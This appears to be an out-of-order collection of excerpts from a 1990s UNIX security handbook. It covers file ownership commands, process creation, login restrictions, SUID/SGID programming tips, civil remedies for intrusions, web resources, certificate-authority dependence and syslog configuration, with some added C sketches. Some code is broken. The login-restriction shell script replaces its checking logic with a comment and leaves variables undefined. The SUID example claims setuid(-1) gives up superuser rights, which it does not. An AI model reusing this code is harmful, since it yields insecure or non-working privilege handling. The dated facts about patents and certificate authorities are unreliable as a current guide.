You should check the format of both the passwd and group files on a regular basis. With many versions of<br />

<strong>UNIX</strong> with System V ancestry, there are two commands on the system that will check the files for number of<br />

fields, valid fields, and other consistency factors. These two programs are pwck and grpck; they are usually<br />

found in /etc or /usr/sbin.<br />

Also on SVR4 systems is the logins command. When issued with the -p option, it will check for any accounts<br />

without a password. When issued with the -d option, it will check for duplicate IDs - including accounts that<br />

have an ID of 0 in addition to the root account.<br />

If you do not have access to these commands, you can write your own to do some of these same checks. For<br />

instance:<br />

# awk -F: 'NF != 7 || $2 == 0 { print "Problem with " $0 }' /etc/passwd
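If the logins command is not available either, the checks it performs can be approximated the same way.
A sketch (the first command reports accounts with empty password fields, the second reports every account
with UID 0, and the third prints any UID that appears more than once):

# awk -F: '$2 == "" { print $1 ": no password" }' /etc/passwd
# awk -F: '$3 == "0" { print $1 ": UID 0" }' /etc/passwd
# cut -d: -f3 /etc/passwd | sort -n | uniq -d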


Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

5.8 chgrp: Changing a File's Group<br />

The chgrp command lets you change the group of a file. The behavior here mirrors that of chown. Under<br />

most modern versions of <strong>UNIX</strong>, you can change the group of a file if you are either one of the following<br />

users:<br />

●   You are the file's owner and you are in the group to which you are trying to change the file.

●   You are the superuser.

On older AT&T versions of <strong>UNIX</strong>, you may set any file you own to any group that you want. That is,<br />

you can "give away" files to other groups, the same as you can give away files to other users. Beware.<br />

The chgrp command has the form:<br />

chgrp [ -fRh ] group filelist<br />

The -f and -R options are interpreted the same as they are for the chmod and chown commands. The -h<br />

option is a bit different from that of chmod. Under chgrp, the option specifies that the group of the link<br />

itself is changed and not what the link points to.<br />

Other entries have the following meanings:<br />

group<br />

The group to which you are changing the file(s). The group may be specified by name or with its<br />

decimal GID.<br />

filelist<br />

The list of files whose group you are changing.<br />

For example, to change the group of the file paper.tex to chem, you would type:<br />

% chgrp chem paper.tex<br />

% ls -l paper.tex<br />

-rw-r--r-- 1 kevin chem 59321 Jul 12 13:54 paper.tex<br />

%<br />


Appendix C<br />

<strong>UNIX</strong> Processes<br />

C.2 Creating Processes<br />

A <strong>UNIX</strong> process can create a new process with the fork() system function.[6] fork() makes an identical<br />

copy of the calling process, with the exception that one process is identified as the parent or parent<br />

process, while the other is identified as the child or child process.<br />

[6] fork is really a family of system calls. There are several variants of the fork call,<br />

depending on the version of <strong>UNIX</strong> that is being used, including the vfork() call, special calls<br />

to create a traced process, and calls to create a special kind of process known as a thread.<br />

Note the following differences between child and parent:<br />

●   They have different PIDs.

●   They have different PPIDs (parent PIDs).

●   Accounting information is reset for the child.

●   They each have their own copy of the file descriptors.

The exec family of system functions lets a process change the program that it is running. Processes terminate when they call the _exit system function or when they generate an exception, such as attempting to execute an illegal instruction or to address an invalid region of memory.

UNIX uses special programs, called shells (/bin/ksh, /bin/sh, and /bin/csh are all common shells), to read commands from the user and run other programs. A shell runs other programs by first executing one of the fork family of calls to create a near-duplicate second process; the second process then uses one of the exec family of calls to run the new program, while the first process waits until the second process finishes. This technique is used to run virtually every program in UNIX, from small programs like /bin/ls to large programs like word processors.
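As an illustration of the technique just described, here is a minimal sketch (not from the original text) in which a parent process fork()s, the child exec()s /bin/ls with an explicit path, and the parent waits for it to finish, just as a shell would:

/* Minimal sketch of the fork-then-exec technique described above. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    pid_t pid = fork();                 /* create a near-duplicate process */

    if (pid < 0) {
        perror("fork");
        exit(1);
    }
    if (pid == 0) {
        /* child: replace this program with /bin/ls */
        execl("/bin/ls", "ls", "-l", (char *)0);
        perror("execl");                /* only reached if the exec fails */
        _exit(127);
    }

    /* parent: wait for the child to finish, just as a shell does */
    int status;
    waitpid(pid, &status, 0);
    printf("child %ld exited with status %d\n",
           (long)pid, WEXITSTATUS(status));
    return 0;
}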

If all of the processes on the system were suddenly to die (or exit), the computer would be unusable, because there would be no way to start a new process. In practice this scenario never occurs, for reasons that will be described later.



Chapter 8
Defending Your Accounts

8.3 Restricting Logins

Some systems have (or will soon have) the ability to restrict the circumstances under which each user may log in. In particular, you could specify times of day and days of the week during which each account may not log in. You could also restrict an account's logins to a particular terminal line.

These restrictions are very useful additional features to have, if they are available. They help block access to accounts that are only used in a limited environment, thus narrowing the "window of opportunity" an attacker might have to exploit the system.

For example, if your system is used in a business setting, perhaps the VP of finance never logs in from a network terminal, and he is never at work outside the hours of 7 a.m. to 7 p.m. on weekdays. You could therefore configure his account to prohibit logins from network terminals or outside those hours. If an attacker knew the account existed and was involved in password cracking or other intelligence gathering over an off-site network connection, she would not be able to get in even if she stumbled across the correct password.

If your system does not support this feature yet, you can ask your vendor when it will be provided. If you want to put in your own version, you can do so with a simple shell script:

1. First, write a script something like the following and put it in a secure location, such as /etc/security/restrictions/fred:

#!/bin/ksh
allowed_ttys="/dev/tty@(01|02|03)"
allowed_days="@(Mon|Tue|Wed|Thu|Fri)"
allowed_hours="(( hour >= 7 && hour <= 18 ))"   # roughly 7 a.m. to 7 p.m.


# determine the current tty, day, and hour, find the user's real shell,
# and refuse to continue unless they match the allowed_* settings above
exec -a -${real_shell##*/} "$real_shell" "${1+"$@"}"

2. Replace the user's login shell with this script in the /etc/passwd file. Do so with the usermod -s command, the vipw command, or an equivalent:

# usermod -s /etc/security/restrictions/fred fred

3. Remove the user's ability to change his or her own shell. If everyone on the system is going to have constraints on login place and time, then you can simply:

# chmod 0 /bin/chsh

This method is preferable to deleting the command entirely because you might need it again later.[3]

[3] Be very careful when running this command: it will only work if /bin/chsh is a single-purpose program that only changes the user's shell. If passwd is a link to chsh (or to other password utilities), the chmod can break a lot of things. Under SunOS 4.1.x, /bin/passwd is a hard link to /bin/chfn, so if you do this chmod, people won't be able to change passwords either! (This may be the case for other operating systems as well.) Note as well that removing chsh won't work either in this case, because users can ln -s /bin/passwd chfn and run it that way. Finally, some passwd programs have the chfn functionality as a command-line option! On these systems, you can only prevent a user from changing his shell by removing the unapproved shells from the /etc/shells file.

If only a few people are going to have restricted access, create a new group named restricta (or similar), and add all of the restricted users to that group. Then, do:

# chmod 505 /bin/chsh
# chgrp restricta /bin/chsh

This will allow other users to change their shells, but not anyone in the restricta group.

NOTE: If you take this approach, either with a vendor-supplied method or something like the example above, keep in mind that there are circumstances in which some users may need access at different times. In particular, users traveling to different time zones, or working on big year-end projects, may need other forms of access. It is important that someone with the appropriate privileges be on call to alter these restrictions if needed. Remember that the goal of security is to protect users, not to get in the way of their work!



Chapter 5
The UNIX Filesystem

5.7 chown: Changing a File's Owner

The chown command lets you change the owner of a file. Under most modern versions of UNIX, only the superuser can change the owner of a file.

The chown command has the form:

chown [ -fRh ] owner filelist

The -f and -R options are interpreted exactly as they are for the chmod and chgrp commands, if supported. The -h option is a bit different from that of chmod: under chown, it specifies that the owner of the link itself is changed, not that of the file the link points to.

The other entries have the following meanings:

owner

The file's new owner; specify the owner by name or by decimal UID.

filelist

The list of files whose owner you are changing.

In earlier versions of UNIX, all users could run the chown command to change the ownership of a file that they owned to that of any other user on the system. This let them "give away" a file. The feature made sharing files back and forth possible, and allowed a user to turn over project directories to someone else.

Allowing users to give away files can be a security problem, because it makes a miscreant's job of hiding his tracks much easier. If someone has acquired stolen information or is running programs that are trying to break computer security, that person can simply change the ownership of the files to that of another user. If he sets the permissions correctly, he can still read the results. Permitting file give-aways also makes file quotas useless: a user who runs out of quota simply changes the ownership of his larger files to another user. Worse, perhaps, he can create a huge file and change its ownership to someone else, instantly exceeding that user's quota. If the file is in a directory to which the victim does not have access, he or she is stuck.

The BSD development group saw these problems and changed the behavior of chown so that only the superuser could change the ownership of files. This change has led to an interesting situation. When the POSIX group working on a standard was faced with the hard choice of which behavior to pick as standard, they bravely took a stand and said "both." Thus, depending on the setting of a system configuration parameter, your system can use either the old AT&T behavior or the BSD-derived behavior. We strongly urge you to choose the BSD-derived behavior. Not only does it allow you to use file quotas and keep mischievous users from framing other users, but many software packages you might download from the net or buy from vendors will not work properly if run under the old AT&T-style environment.

NOTE: If your system came to you with the old chown behavior, then ensure that the software was written with that in mind. Be extra careful as you read some of our advice in this book, because a few things we might recommend won't work for you on such a system. Also, be especially cautious about software you might download from the net or buy from a vendor. Most of this software has been developed under BSD-derived systems that limit use of chown to the superuser. Thus, the software might have vulnerabilities when run under your environment.

Do not mix the two types of systems when you are using some form of network filesystem or removable, user-mountable media. The result can be a compromise of your system. Files created using one paradigm may possibly be exploited using the other.

Under some versions of UNIX (particularly those that let nonsuperusers chown files), chown will clear the SUID, SGID, and sticky bits. This is a security measure, so that SUID programs are not accidentally created. If your version of UNIX does not clear these bits when using chown, check with an ls -l after you have done a chown to make sure that you have not suddenly created a SUID program that will allow your system's security to be compromised. (Actually, this check is a good habit to get into even if your system does do the right thing.) Other versions of UNIX will clear the execute, SUID, and SGID bits when the file is written or modified. You should determine how your system behaves under these circumstances and be alert to combinations of actions that might accidentally create a SUID or SGID file.

POSIX specifies that when chown is executed on a symbolic link, the ownership of the target of the link is changed instead of the ownership of the link itself. POSIX further specifies that the -R option does not follow symbolic links if they point to directories (but nevertheless changes the ownership of those directories). On most modern versions of UNIX, there is a -h option to chown (and chgrp and chmod) that instructs the command not to follow the link and instead either change the permissions on the link itself or ignore the symbolic link and change nothing. You should understand how this behaves on your system and use it if appropriate.
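On systems that provide it, the -h behavior corresponds to the lchown() library call, which operates on the link itself, while chown() follows the link. The sketch below is an illustration, not from the original text; the link name and UID are placeholders, and changing an owner still requires superuser privileges on BSD-derived systems:

/* Minimal sketch: chown() follows a symbolic link and changes its target,
 * while lchown() - the call behind -h on many systems - changes the link. */
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int change_owner(const char *path, uid_t new_owner, int follow_links)
{
    /* (gid_t)-1 leaves the group untouched in both calls */
    int r = follow_links ? chown(path, new_owner, (gid_t)-1)
                         : lchown(path, new_owner, (gid_t)-1);
    if (r < 0)
        perror(path);
    return r;
}

int main(void)
{
    change_owner("link", 100, 1);   /* changes whatever "link" points to   */
    change_owner("link", 100, 0);   /* changes the link itself, like -h    */
    return 0;
}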



Chapter 23
Writing Secure SUID and Network Programs

23.4 Tips on Writing SUID/SGID Programs

If you are writing programs that are SUID or SGID, you must take added precautions in your programming. An overwhelming number of UNIX security problems have been caused by SUID/SGID programs. These rules should be considered in addition to the previous list.

Here are some rules for writing (and not writing) SUID/SGID programs:

1. "Don't do it. Most of the time, it's not necessary."[11]

[11] Thanks to Patrick H. Wood and Stephen G. Kochan, UNIX System Security, Hayden Books, 1985, for this insightful remark.

2. Avoid writing SUID shell scripts.

3. If you are using SUID to access a special set of files, don't. Instead, create a special group for your files and make the program SGID to that group. If you must use SUID, create a special user for the purpose.

4. If your program needs to perform some functions as superuser, but generally does not require SUID permissions, consider putting the SUID part in a different program and constructing a carefully controlled and monitored interface between the two.

5. If you need SUID or SGID permissions, use them for their intended purpose as early in the program as possible, and then revoke them by returning the effective, and real, UIDs and GIDs to those of the process that invoked the program.

6. If you have a program that absolutely must run as SUID, try to avoid equipping the program with a general-purpose interface that allows users to specify much in the way of commands or options.

7. Erase the execution environment, if at all possible, and start fresh. Many security problems have been caused because there was a significant difference between the environment in which the program was run by an attacker and the environment under which the program was developed. (See item 5 under Section 23.2, "Tips on Avoiding Security-related Bugs," earlier in this chapter for more information about this suggestion.)

8. If your program must spawn processes, use only the execve(), execv(), or execl() calls, and use them with great care. Avoid the execlp() and execvp() calls, because they use the PATH environment variable to find an executable, and you might not run what you think you are running.

9. If you must provide a shell escape, be sure to setgid(getgid()) and setuid(getuid()) before executing the user's command.

10. In general, use the setuid() and setgid() functions to bracket the sections of your code which require superuser privileges. For example:

setuid(0);    /* Become superuser to open the master file */
fd = open("/etc/masterfile", O_RDONLY);
setuid(-1);   /* Give up superuser for now */
if (fd < 0)
        /* ...handle the failed open... */



11. Set the PATH and IFS environment variables to known, safe values before using any subshells or library routines that consult them. For example:

putenv("PATH=/bin:/usr/bin:/usr/ucb");
putenv("IFS= \t\n");

Then, examine the environment to be certain that there is only one instance of each variable: the one you set. An attacker can run your code from another program that creates multiple instances of an environment variable. Without an explicit check, you may find the first instance, but not the others; such a situation could result in problems later on. In particular, step through the elements of the environment yourself rather than depending on the library getenv() function (see the sketch following this list).

12. Use the full pathname for all files that you open. Do not make any assumptions about the current directory. (You can enforce this requirement by doing a chdir("/tmp/root/") as one of the first steps in your program, but be sure to check the return code!)

13. Consider statically linking your program, if possible. If a user can substitute a different module in a dynamic library, even carefully coded programs are vulnerable. (We have some serious misgivings about the trend in commercial systems towards completely shared, dynamic libraries. See our comments in Chapter 11, Protecting Against Programmed Threats.)

14. Consider using perl -T or taintperl for your SUID programs and scripts. Perl's tainting features make it more suited to SUID programming than C. For example, taintperl will insist that you set the PATH environment variable to a known "safe value" before calling system(). The program will also require that you "untaint" any variable that is input from the user before using it (or any variable dependent on that variable) as an argument for opening a file. However, note that you can still get yourself in a great deal of trouble with taintperl if you circumvent its checks or you are careless in writing code. Also note that using taintperl introduces a dependence on another large body of code working correctly: we'd suggest you skip using taintperl if you believe you can code at least as well as Larry Wall.[12]

[12] Hint: if you think you can, you are probably wrong.
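As mentioned in item 11, a SUID program should walk the environment itself rather than trust getenv(). The following minimal sketch (an illustration, not from the original text) scans the environ array and flags duplicate definitions of PATH or IFS:

/* Minimal sketch of scanning the environment yourself: walk the environ
 * array and reject duplicate definitions of a variable such as PATH,
 * rather than trusting the first value that getenv() happens to return. */
#include <stdio.h>
#include <string.h>

extern char **environ;

/* Count how many times "name=" appears in the environment. */
int count_env(const char *name)
{
    size_t len = strlen(name);
    int count = 0;

    for (char **ep = environ; *ep != NULL; ep++) {
        if (strncmp(*ep, name, len) == 0 && (*ep)[len] == '=')
            count++;
    }
    return count;
}

int main(void)
{
    if (count_env("PATH") != 1 || count_env("IFS") != 1) {
        fprintf(stderr, "suspicious environment: duplicate PATH or IFS\n");
        return 1;
    }
    return 0;
}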

23.4.1 Using chroot()

If you are writing a SUID root program, you can enhance its security by using the chroot() system call. The chroot() call changes the root directory of a process to a specified subdirectory within your filesystem. This change essentially gives the calling process a private world from which it cannot escape.

For example, if you have a program that only needs to listen to the network and write into a log file that is stored in the directory /usr/local/logs, then you could execute the following system call to restrict the program to that directory:

chroot("/usr/local/logs");

There are several issues that you must be aware of when using the chroot() system call that are not immediately obvious:

1. If your operating system supports shared libraries and you are able to statically link your program, be sure that your program is statically linked. On some systems, static linking is not possible; on those systems, make certain that the necessary shared libraries are available within the restricted directory (as copies).

2. You should not give users write access to the chroot()'ed directory.

3. If you intend to log with syslog(), you should call the openlog() function before executing the chroot() system call, or make sure that a /dev/log device file exists within the chroot() directory.

Note that under some versions of UNIX, a user with a root shell and the ability to copy compiled code into the chroot'd environment may be able to "break out." Thus, don't put all your faith in this mechanism.
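Putting these points together, a confined SUID-root program might be structured roughly as in the following sketch (an illustration, not from the original text; the daemon name and the UID/GID of 100 are placeholders). Note that openlog() is called before chroot(), the process chdir()s into the new root, and superuser privileges are then given up:

/* Minimal sketch of confining a SUID-root program to /usr/local/logs. */
#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>
#include <unistd.h>

int main(void)
{
    openlog("logdaemon", LOG_PID, LOG_DAEMON); /* before chroot(), per item 3 */

    if (chroot("/usr/local/logs") < 0) {       /* confine the process */
        perror("chroot");
        exit(1);
    }
    if (chdir("/") < 0) {                      /* don't keep a cwd outside the new root */
        perror("chdir");
        exit(1);
    }

    /* give up superuser privileges for the rest of the run;
     * the GID/UID of 100 is only a placeholder */
    if (setgid(100) < 0 || setuid(100) < 0) {
        perror("setgid/setuid");
        exit(1);
    }

    syslog(LOG_INFO, "running confined to /usr/local/logs");
    /* ... listen to the network and write log records here ... */
    closelog();
    return 0;
}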



Chapter 26
Computer Security and U.S. Law

26.3 Civil Actions

Besides criminal law, the courts also offer remedies through civil actions (lawsuits). The nature of lawsuits is such that you can basically sue anyone for any reasonable claim of damages or injury. You can even sue parties unknown, as long as some hope exists of identifying them at a later time. You can ask for actual and punitive damages, injunctive relief (cease-and-desist orders), and other remedies. Often, a case is easier to prove in a civil court than in a criminal court: civil cases require a less strict standard of proof than criminal cases (a "preponderance of the evidence" as opposed to the "beyond a reasonable doubt" standard used in criminal cases).

Civil remedies are also much easier to obtain after a criminal conviction has been secured.

However, filing civil suits for damages in the case of break-ins or unauthorized activity may not be a practical course of action, for several reasons:

1. Civil suits can be very expensive to pursue. Criminal cases are prosecuted by a government unit, and evidence collection and trial preparation are paid for by the government. In a civil case, the gathering of evidence and the preparation of trial material are done by your lawyers - and you pay for it. Good lawyers still charge more than most computer consultants; therefore, the cost of preparing even a minor suit may be quite high. If you win your case, you may be able to have your lawyers' fees included in your award, but don't count on such provisions. Note, however, that criminal cases may sometimes be used as the basis for later civil action.

2. The preparation and scheduling of a lawsuit may take many years. In the meantime, unless you are able to get temporary injunctions, whatever behavior you are seeking to punish may continue. The delay can also continue to increase the cost of your preparation.

3. You may not win a civil case. Even if you do win, it's possible that your opponent will not have any resources with which to pay damages or your lawyer fees, so you may be out a considerable sum of money without any satisfaction other than the moral victory of a court decision in your favor. What's more, your opponent can always appeal - or countersue.

The vast majority of civil cases are settled out of court. Simply beginning the process of bringing suit may be sufficient to force your opponent into a settlement. If all you are seeking is to stop someone from breaking into your system, or to force someone to repay you for stolen computer time or documents, a lawsuit may be an appropriate course of action. In many cases, especially those involving juveniles trying to break into your system, having a lawyer send an official letter of complaint demanding an immediate stop to the activity may be a cheap and effective way of achieving your goal.


As with other legal matters, you should consult with a trained attorney to discuss trade-offs and alternatives. There is a wide range of possibilities available to you depending on your locale, the nature of your complaint, and the nature of your opponent (business, individual, etc.).

Never threaten a lawsuit without prior legal advice. Such threats may lead to problems you don't need - or want.



Appendix E
Electronic Resources

E.3 WWW Pages

There are dozens of WWW pages with pointers to other information. Some pages are comprehensive, and others are fairly narrow in focus. The ones we list here provide a good starting point for any browsing you might do. You will find most of the other useful directories linked into one or more of these pages, and you can then build your own set of "bookmarks."

E.3.1 CIAC

The staff of the CIAC keep a good archive of tools and documents available on their site. This archive includes copies of their notes and advisories, and some locally developed software:

http://ciac.llnl.gov

E.3.2 COAST

COAST (Computer Operations, Audit, and Security Technology) is a multi-project, multi-investigator effort in computer security research and education in the Computer Sciences Department at Purdue University. It is intended to function with close ties to researchers and engineers in major companies and government agencies. COAST focuses on real-world research needs and limitations. (See the sidebar.)

The WWW hotlist index at COAST is the most comprehensive list of its type available on the Internet as of the publication of this edition:

http://www.cs.purdue.edu/coast/coast.html

E.3.3 FIRST

The FIRST (Forum of Incident Response and Security Teams) Secretariat maintains a large archive of material, including pointers to WWW pages for other FIRST teams:

http://www.first.org/first


E.3.4 NIH

The WWW index page at NIH provides a large set of pointers to internal collections and other archives:

http://www.alw.nih.gov/Security/security.html

E.3.5 Telstra

Telstra Corporation maintains a comprehensive set of WWW pages on the topic of Internet and network security at:

http://www.telstra.com.au/info/security.html



Chapter 18
WWW Security

18.6 Dependence on Third Parties

It is impossible to eliminate one's dependence on other individuals and organizations. Computers need electricity to run, which makes most computer users dependent on their power company for continued operations. You can purchase an electrical generator or a solar power system, but this simply shifts the dependence from the power company to the firm that supplies the fuel for the generator, or the firm that makes replacement parts for the solar power system.[7]

[7] There is also a dependence on the continued operation of Sol itself.

Most organizations attempt to limit their risk by arranging for multiple suppliers of their key resources. For example, you might purchase your electricity from a utility, but have a diesel generator for backup. If you are a newspaper, you might have several suppliers of paper. That way, if you have a dispute with one supplier, you can still publish your newspaper by buying from another.

Likewise, it is important to be sure that you have multiple suppliers for all of your key computer resources. It is unwise to be in a position where the continued operation of your business depends on your continued relationship with an outside supplier, because this gives the supplier control over your business.

Today, there are many choices for organizations that are deploying Web servers. Web servers can be run on a wide variety of platforms, including UNIX, Windows, and Macintosh, and there are many different Web servers available for the same hardware.

There are fewer choices available when organizations need to purchase secure Web servers - that is, Web servers that provide for cryptographic protection of data and authentication of their users. This restriction is a result of the fact that the use of public-key cryptography in the United States will be covered by patents until the year 1997 (in the case of the Diffie-Hellman and Hellman-Merkle patents) or the year 2000 (in the case of the RSA patent). Currently, the use of these patents is controlled by two companies: Cylink, based in Sunnyvale, California, and RSA Data Security, based in Redwood City, California. Because of the existence of these patents, and because of the widespread adoption of the RSA technology by the Web community, it is highly unlikely that a server that implements cryptographic security will be produced and sold in the United States that is not licensed, directly or indirectly, by RSA Data Security.

One of the primary purposes of encryption is to assure consumers that when they contact a Web server, the server actually belongs to the company to which it claims to belong. You can't trust the Web server itself, so companies such as Netscape Communications have turned to a trusted third party, Verisign Inc. Netscape has embedded Verisign's public key in both its Secure Commerce Server and its Web browser. The browser will not switch into its secure, encrypted mode unless it is presented with a digital ID from the server that is signed by Verisign's secret key.

And Netscape is not alone. At the time of this writing (December 1995), all secure Web servers and browsers used Verisign as their trusted certification authority. Although there are plans for other such authorities, none currently exist.

This presents businesses with a dilemma. Digital IDs signed by Verisign must be renewed every year to remain valid, but Verisign is under no legal obligation to renew them. This means that, should a dispute arise between Verisign and a company using a secure Web browser, Verisign could simply choose not to renew the company's key, and the company would lose the cryptographic capabilities of its program. Note that this is not a problem with Verisign, per se, but with the whole scheme of certification authorities with whom you have no direct contractual relationship.

There are several solutions to this problem. The obvious one is for there to be alternative certification authorities, and for browsers and servers to accept digital identification credentials from any certification authority, giving the user the choice of whether or not the authority should be trusted. We have been told that these changes will be made in a future version of Netscape's Navigator. But we include this discussion to illustrate the risk of depending on third parties. Even if these risks are minimized in the Netscape products, third-party dependencies are likely to continue in many different forms. Be on the lookout for them!



Chapter 10
Auditing and Logging

10.5 The UNIX System Log (syslog) Facility

In addition to the various logging facilities mentioned above, many versions of UNIX provide a general-purpose logging facility called syslog, originally developed at the University of California at Berkeley for the Berkeley sendmail program. Since then, syslog has been ported to several System V-based systems and is now widely available. The uses of syslog have similarly been expanded.

syslog is a host-configurable, uniform system logging facility. The system uses a centralized system logging process that runs the program /etc/syslogd or /etc/syslog. Individual programs that need to have information logged send the information to syslog. The messages can then be logged to various files, devices, or computers, depending on the sender of the message and its severity.

Any program can generate a syslog log message. Each message consists of four parts:

● Program name

● Facility

● Priority

● The log message itself

For example, the message:

login: Root LOGIN REFUSED on ttya

is a log message generated by the login program. It means that somebody tried to log into an unsecure terminal as root. The message's facility (authorization) and error level (critical error) are not shown.
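A C program supplies these parts through the standard openlog() and syslog() library calls, as in the following minimal sketch (an illustration, not from the original text; the program name mydaemon is a placeholder):

/* Minimal sketch: generate a syslog message from a program. */
#include <syslog.h>

int main(void)
{
    openlog("mydaemon", LOG_PID, LOG_AUTH);           /* program name and facility */
    syslog(LOG_CRIT, "LOGIN REFUSED on %s", "ttya");  /* priority and message text */
    closelog();
    return 0;
}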

The syslog facilities are summarized in Table 10.1. Not all facilities are present on all versions of UNIX.

Table 10.1: syslog Facilities

Name             Facility
kern             Kernel
user             Regular user processes
mail             Mail system
lpr              Line printer system
auth             Authorization system, or programs that ask for user names and passwords (login, su, getty, ftpd, etc.)
daemon           Other system daemons
news             News subsystem
uucp             UUCP subsystem
local0...local7  Reserved for site-specific use
mark             A timestamp facility that sends out a message every 20 minutes


The syslog priorities are summarized in Table 10.2:

Table 10.2: syslog Priorities

Priority   Meaning
emerg      Emergency condition, such as an imminent system crash; usually broadcast to all users
alert      Condition that should be corrected immediately, such as a corrupted system database
crit       Critical condition, such as a hardware error
err        Ordinary error
warning    Warning
notice     Condition that is not an error, but possibly should be handled in a special way
info       Informational message
debug      Messages that are used when debugging programs
none       Do not send messages from the indicated facility to the selected file. For example, specifying *.debug;mail.none sends all messages except mail messages to the selected file.

When syslogd starts up, it reads its configuration file, usually /etc/syslog.conf, to determine what kinds of events it should log and where they should be logged. syslogd then listens for log messages from the three sources shown in Table 10.3.

Table 10.3: Log Message Sources

Source        Meaning
/dev/klog     Special device, used to read messages generated by the kernel
/dev/log      UNIX domain socket, used to read messages generated by processes running on the local machine
UDP port 514  Internet domain socket, used to read messages generated over the local area network by other machines
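For illustration only (this sketch is not from the original text), a message arriving on UDP port 514 is simply a datagram whose body begins with a priority value computed as facility * 8 + severity; the loghost address below is a placeholder:

/* Minimal sketch: send one raw syslog datagram to UDP port 514.
 * "<34>" is auth (4) * 8 + crit (2); 192.0.2.10 is a placeholder loghost. */
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(void)
{
    const char *msg = "<34>login: ROOT LOGIN REFUSED on ttya";
    struct sockaddr_in dst;
    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) {
        perror("socket");
        return 1;
    }
    memset(&dst, 0, sizeof(dst));
    dst.sin_family = AF_INET;
    dst.sin_port = htons(514);                        /* the syslog UDP port */
    inet_pton(AF_INET, "192.0.2.10", &dst.sin_addr);  /* placeholder loghost */

    if (sendto(s, msg, strlen(msg), 0,
               (struct sockaddr *)&dst, sizeof(dst)) < 0)
        perror("sendto");
    return 0;
}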

10.5.1 The syslog.conf Configuration File

The /etc/syslog.conf file controls where messages are logged. A typical syslog.conf file might look like this:

*.err;kern.debug;auth.notice     /dev/console
daemon,auth.notice               /var/adm/messages
lpr.*                            /var/adm/lpd-errs
auth.*                           root,nosmis
auth.*                           @prep.ai.mit.edu
*.emerg                          *
*.alert                          |dectalker
mark.*                           /dev/console

NOTE: The format of the syslog.conf configuration file may vary from vendor to vendor. Be sure to check the documentation for your own system.

Each line of the file contains two parts:

● A selector that specifies which kind of messages to log (e.g., all error messages or all debugging messages from the kernel).

● An action field that says what should be done with the message (e.g., put it in a file or send the message to a user's terminal).

NOTE: You must use the tab character between the selector and the action field. If you use a space, it will look the same, but syslog will not work.


Message selectors have two parts: a facility and a priority. kern.debug, for example, selects all debug messages (the priority) generated by the kernel (the facility). It also selects all priorities that are greater than debug. An asterisk in place of either the facility or the priority indicates "all." (That is, *.debug means all debug messages, while kern.* means all messages generated by the kernel.) You can also use commas to specify multiple facilities. Two or more selectors can be grouped together by using a semicolon. (Examples are shown above.)

The action field specifies one of five actions:[7]

[7] Some versions of syslog support additional actions, such as logging to a proprietary error management system.

● Log to a file or a device. In this case, the action field consists of a filename (or device name), which must start with a forward slash (e.g., /var/adm/lpd-errs or /dev/console).[8]

[8] Beware: logging to /dev/console creates the possibility of a denial of service attack. If you are logging to the console, an attacker can flood your console with log messages, rendering it unusable.

● Send a message to a user. In this case, the action field consists of a username (e.g., root). You can specify multiple usernames by separating them with commas (e.g., root,nosmis). The message is written to each terminal where these users are shown to be logged in, according to the utmp file.

● Send a message to all users. In this case, the action field consists of an asterisk (e.g., *).

● Pipe the message to a program. In this case, the program is specified after the UNIX pipe symbol (|).[9]

[9] Some versions of syslog do not support logging to programs.

● Send the message to the syslog on another host. In this case, the action field consists of a hostname preceded by an at sign (e.g., @prep.ai.mit.edu).

With the following explanations, the typical syslog.conf configuration file shown earlier becomes easy to understand.

*.err;kern.debug;auth.notice     /dev/console

This line causes all error messages, all kernel debug messages, and all notice messages generated by the authorization system to be printed on the system console. If your system console is a printing terminal, this process will generate a permanent hardcopy that you can file and use for later reference. (Note that kern.debug means all messages of priority debug and above.)

daemon,auth.notice               /var/adm/messages

This line causes all notice messages from either the system daemons or the authorization system to be appended to the file /var/adm/messages. Note that this is the second line that mentions auth.notice messages. As a result, auth.notice messages will be sent to both the console and the messages file.

lpr.*                            /var/adm/lpd-errs

This line causes all messages from the line printer system to be appended to the /var/adm/lpd-errs file.

auth.*                           root,nosmis

This line causes all messages from the authorization system to be sent to the users root and nosmis. Note, however, that if these users are not logged in, the messages will be lost.

auth.*                           @prep.ai.mit.edu

This line causes all authorization messages to be sent to the syslog daemon on the computer prep.ai.mit.edu. If you have a cluster of many different machines, you may wish to have them all perform their logging on a central (and presumably secure) computer.

*.emerg                          *

This line causes all emergency messages to be displayed on every user's terminal.

*.alert                          |dectalker

This line causes all alert messages to be sent to a program called dectalker, which might broadcast the message over a public address system.

mark.*                           /dev/console

This line causes the time to be printed on the system console every 20 minutes. This is useful if you have other information being printed on the console and you want a running clock on the printout.

NOTE: By default, syslog will accept log messages from arbitrary hosts sent to the local syslog UDP port. This can result in a denial of service attack if the port is flooded with messages faster than the syslog daemon can process them. Individuals can also log fraudulent messages. You must properly screen your network against outside log messages.

10.5.2 Where to Log

Because the syslog facility provides many different logging options, individual sites have a great deal of flexibility in setting up their own logging. Different kinds of messages can be handled in different ways. For example, most users won't want to be bothered with most log messages. On the other hand, auth.crit messages should be displayed on the system administrator's screen (in addition to being recorded in a file). This section describes a few different approaches.

10.5.2.1 Logging to a printer

If you have a printer you wish to devote to system logging, you can connect it to a terminal port and specify that port name in the /etc/syslog.conf file.

For example, you might connect a special-purpose printer to the port /dev/ttya. You can then log all messages from the authorization system (such as invalid passwords) by inserting the following line in your syslog.conf file:

auth.*                           /dev/ttya

A printer connected in such a way should only be used for logging. We suggest using dot-matrix printers, rather than laser printers, because dot-matrix printers allow you to view the log line by line as it is written, rather than waiting until an entire page is completed.

Logging to a hardcopy device is a very good idea if you think that your system is being visited by unwelcome intruders on a regular basis. The intruders can erase log files, but after something is sent to a printer, they cannot touch the printer output without physically breaking into your establishment.[10]

[10] Although if they have superuser access, they can temporarily stop logging or change what is logged.

NOTE: Be sure that you do not log solely to a hardcopy device. Otherwise, you will lose valuable information if the printer jams or runs out of paper, the ribbon breaks, or somebody steals the paper printout.

10.5.2.2 Logging across the network

If you have several machines connected together by a TCP/IP network, you may wish to have events from all of the machines logged on one (or more) log machines. If this machine is secure, the result will be a log file that can't be altered, even if the security on the other machines is compromised. To have all of the messages from one computer sent to another computer, you simply insert this line in the first computer's syslog.conf file:

*.*                              @loghost

